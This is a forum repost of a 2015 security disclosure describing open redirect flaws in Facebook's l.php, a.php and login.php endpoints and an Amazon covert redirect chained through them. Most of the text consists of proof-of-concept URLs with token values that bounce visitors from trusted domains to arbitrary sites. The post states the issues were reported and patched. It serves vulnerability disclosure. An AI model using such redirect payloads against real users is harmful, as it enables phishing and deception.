Facebook Open Redirect Old & New

[Aerosol]

*Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A
New Open Redirect Security Vulnerability*



*Domain:*
http://www.facebook.com



*Discover:*
Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang
Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/




*(1) General Vulnerabilities Description:*


*(1.1)* Two Facebook vulnerabilities are introduced in this article.
Facebook has a security problem. It can be exploited by Open Redirect
attacks. Since Facebook is trusted by large numbers of other websites.
Those vulnerabilities can be used to do "Covert Redirect" to other websites
such as Amazon, eBay, etc.


*(1.1.1)*
One Facebook Open Redirect vulnerability was reported to Facebook. Facebook
adopted a new mechanism to patch it. Though the reported URL redirection
vulnerabilities are patched. However, all old generated URLs are still
vulnerable to the attacks. Section (2) gives detail of it.

The reason may be related to Facebook's third-party interaction system or
database management system or both. Another reason may be related to
Facebook's design for different kind of browsers.


*(1.1.2)*
Another new Open Redirect vulnerability related to Facebook is introduced,
too. For reference, please read section (3).

Tests were performed on Firefox (version 26.0) on windows 7; Firefox
(version 24.0) on Ubuntu 12.10, Chrome (Version 30.0.1599.114) on Ubuntu
12.10.



*(1.2) Facebook's URL Redirection System Related to "*.php" Files*

All URLs' redirection are based on several files, such l.php, a.php,
landing.php and so on.

The main redirection are based on file "l.php".

For file "l.php", one parameter "h" is used for authentication. When it
mentions to file "a.php", parameter "eid" is used for authentication. All
those two files use parameter "u" for the url redirected to. In some other
files such as "landing.php", parameters such as "url", "next" are used.

<1>For parameter "h", two forms of authentication are used.
   <a>h=HAQHyinFq
   <b>h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA
<2>For parameter "eid", one form of authentication is used.

 <a>eid=AQLP8sRq6lbU0jz0lARx9A9uetB6FIF1N2-Yjj_ePj0d_ezubjstZeDo6qDsalKVJwy6uDb_hQ-9tBsA2dVoQRq0lniOu0os_gPe3gY5l8lYblhQSwBtdvgjXjNqa  xLZMYoasr3vv46tFsh1fL7q4kjT2LFw52dnJWd4SE8qc0YuPWf  gPeQywgM2wl0CoW-lftWkr2dX0dLcytyHjXnvhKfVS_pQBllszUzsPENxE6EuZ-53Lh188o56idnfyyk2L58pE7C94PF-za4ZVB0qbuA2EnPcSJI-7oIiIJmIhifHe0CYTzG512-Z_heN44VlyJHevhS9auAR8-lFCAIlYymnT_Qiwp92RxjNOfBypBvszQUrvB6PH3fANn1prfMB  Vm4RD_GFel14KVDS5USswbTOTkL3sZNhHUqqPHwBwU3JFePMMu  wsfesigH85B_AxCsXUIWN7klKGSq8bPPsKSHttsa9hkkMpSfRK  L7D_xwW4dU2xlmfGWil7jYRJmwfbOeF0zujk1FRBuM757tbfFM  av-J-K9npbdrDrCuUVqV__Tf7CGZ89nPl-M2d09pE9enJj0OBXOaSXZX16LKaYnv1Wh4GKme7C-EOunITxyQtp1zy-48Uaz9mxO2x4bw7sBDfzDStF_Al8_0SMjWNTh-J38rBHAgT96X-dPFI43HU3x3fVymE9szrclBpvTaSfYezatgMzf77s3lQrQAMSl  wSSRIzRuoFvQBmWKT0T5ZFgH5ykhYKhNMiKj577UO5g2Ojm-_-KKF4N_DBuG5R-I6EOSlhok2xUkpKVDnDcxZFTLxGmx5xc56J5kZLjJ96wnF2fH0  9Q19Qc2aU3xYFlEFrKjrlLpwGyOyCDx7_z7y1O4Efqew3Fa0Cb  9s6Kk2jpLF5XEIaYzzXOLAffxXG6icBJVovb9RPmiZ5s9dKYYo  tLol68_X04O05bEvVccPEh-IQwX_VTMt3f23be2MECEq
 R2l1A1ZkJx4qP00GI1pZhU_CXAnjSaTNmtaINRUeSsLNEZZsPw  pWJMfeeGSwuof9krC05eSWjO0jH9tua0KteMYhj8i-3dwSBp4f7nMcFwH5ltfCLhMCYNB8rxgzcAczyhLIo2UY-3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-fWh93MRRaJrrinjtfr9fDSMHM9Cja5xi0eG3Vs0aClnWbeJZA7  9TvmYt7E53HfwGuv5-EJOqRh3cwZF-53uPHA73ikUk3xTApjQunJM4uIBhpy7iBIgn_OXXo3X03YUJtJ  cDuC20ocJbZ310VHliox5tYZF2oiMaOfgo9Y9KeqgsrJgwPCJe  if4aB0Ne4g_oM_Tuqt2pXbdgoCawHIApF087eFKJqejp0jpEkJ  erXPyK-IqsD_SQfIm_2WJSkzwzATwQKs




*(2) Vulnerability Description 1:*

*(2.1) *A security researcher reported two Open Redirect vulnerabilities to
Facebook in 2013. The following are the two links reported.

http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E
http://facebook.com/campaign/landing.php?url=http://www.adcash.com


Though a new mechanism was adopted. However, all old generated redirections
still work by parameter "h" and "eid".


*(2.2)* A website was used for the following tests. The website is "
http://www.tetraph.com/". Suppose this website is malicious.


*(2.2.1)*
<1>First test
<a>file: "l.php"
<b>URL parameter: "u"
<c>authentication parameter: "h"
<d>form: "h=HAQHyinFq".
<e>The authentication has no relation with all other parameters, such as
"s".

Examples:


*URL 1:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1

*Redirect Forbidden:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1

*Redirect Works:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1


*URL 2:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1

*Redirect Forbidden:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1

*Redirect Works:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1



*(2.2.2)*
<2>Second test. It is the same situation as above.
<a>file: "l.php",
<b>url parameter "u"
<c>authentication parameter: "h"
<d>form: "h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA".
<e>The authentication has no relation to all other parameters, such as
"env", "s".

Examples:


*URL 1:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq  vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1

*Redirect Forbidden:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq  vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1

*Redirect Works:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEe  HCe_rdQ&s=1
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw


*URL 2:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3  DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui  6nWmRBqQDoZE0cVww6&s=1

*Redirect Forbidden:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwp  lx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1

*Redirect Works:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui  6nWmRBqQDoZE0cVww6&s=1




*(3) Facebook File "a.php" Open Redirect Security Vulnerability*

*(3.1)*
<a>file: "a.php"
 <b>parameter "u"
<c> authentication parameter: "eid"
<d> form:
"eid=5967147530925355409.6013336879369.AQKBG5nt468Y  gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2  1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj  yVjTv4km2FOEp7WP3w65aVUKP_w".
<e>The authentication has no relation to all other parameters, such as
"mac", "_tn_".

Examples:


*Vulnerable URL:*
https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F  %252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%25  3Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D878  2431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER%  257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCu  D-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8  AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAk  inLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgU  Y6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y  gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2  1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj  yVjTv4km2FOEp7WP3w65aVUKP_w

*POC:*
https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y  gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2  1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj  yVjTv4km2FOEp7WP3w65aVUKP_w
https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.xhamster.com&eid=5967147530925355409.6013336879369.AQKBG5nt468Y  gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2  1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj  yVjTv4km2FOEp7WP3w65aVUKP_w




*(3.2) Facebook Login Page Covert Redirect Security Vulnerability*

*Vulnerable URL Related to Login.php Based on a.php:*
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.  php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fope  nhouse2014%252F%253Futm_source%253Dfacebook%2526ut  m_medium%253Dcpc%2526utm_campaign%253Dopenhouse201  4%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid  %3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzRO  StFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lW  HDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJ  tC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr  5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3  iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx  9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN  _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH  x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW  xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9  c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1  v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec  ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt  j5
 smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon4  1VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp169  5OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s  VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr  ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4  OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8  QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G  1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs

*POC:*
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.  php%3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com  %26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%  3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROS  tFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWH  DJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJt  C71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5  GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3i  wusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx  9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN  _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH  x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW  xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9  c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1  v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec  ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt  j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFo  n41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1  695
 OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s  VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr  ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4  OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8  QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G  1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs




*(4) Amazon Covert Redirect Security Vulnerability Based on Facebook *

Since Facebook is trusted by large numbers of other websites. Those
vulnerabilities can be used to do "Covert Redirect" to other websites such
as Amazon.

The vulnerability exists at "redirect.html?" page with "&location"
parameter, e.g.
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu  %3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCe  YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1


*More Details:*
http://tetraph.com/covert_redirect/
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html


*(4.1)*
When a user is redirected from Amazon to another site, Amazon will check
parameters "&token". If the redirected URL's domain is OK, Amazon will
allow the reidrection.

However, if the URLs in a redirected domain have open URL redirection
vulnerabilities themselves, a user could be redirected from Amazon to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Amazon directly.

One of the vulnerable domain is,
http://www.facebook.com


*(4.2) *
Use one of webpages for the following tests. The webpage address is "
http://www.inzeed.com/kaleidoscope". Suppose it is malicious.


*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3F  v%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

*POC:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu  %3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCe  YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu  %3Dhttp%253A%252F%252Fwww.nicovideo.jp%26h%3D7AQFw  CeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu  %3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeY  DAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu  %3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_  AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.  facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.  pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_nd  x4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.  facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.  naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4  h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.  facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.  craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj  _ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051



*POC Video:*
https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be
https://www.youtube.com/watch?v=f4W63YXnbIk

*Blog Details:*
http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html





Those vulnerabilities were reported to Facebook in 2014 and they have been
patched.




*POC Video:*
https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be


*Blog Details:*
http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html




--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

&

Source

Edited January 13, 2015 by Aerosol

[thedoctor]

ce au vrut sa faca cu l.php?